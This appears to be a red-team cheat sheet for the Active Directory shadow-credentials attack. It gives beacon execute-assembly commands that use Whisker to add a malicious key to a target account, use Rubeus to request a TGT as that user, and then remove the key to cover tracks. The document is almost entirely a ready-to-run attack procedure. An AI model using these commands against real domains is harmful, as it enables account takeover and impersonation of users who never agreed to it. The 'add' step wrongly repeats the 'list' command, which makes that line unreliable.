When an account has shadow credentials configured, the client can obtain a TGT using these credentials (key). In other words, if an attacker has enough privileges to modify a target account’s DACL to add a shadow credential, he can obtain a TGT as that user.
The attack relies on the tool Whisker.
Attack Overview
- Take note of any existing keys on target account.
- Add malicious key to target account.
- Use key to obtain TGT.
- Remove only the malicious key from target after use.
# list existing keys
beacon> execute-assembly C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe list /target:[account]
# add malicious key (record base64-encoded certificate, its encryption password, and deviceid)
beacon> execute-assembly C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe list /target:[target-account]
# get TGT
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:[target-account] /certificate:[cert-base64] /password:"[cert-password]" /nowrap
# remove added key (alternatively use `clear` to remove all keys)
beacon> execute-assembly C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe remove /target:[target-account] /deviceid:[key-deviceid]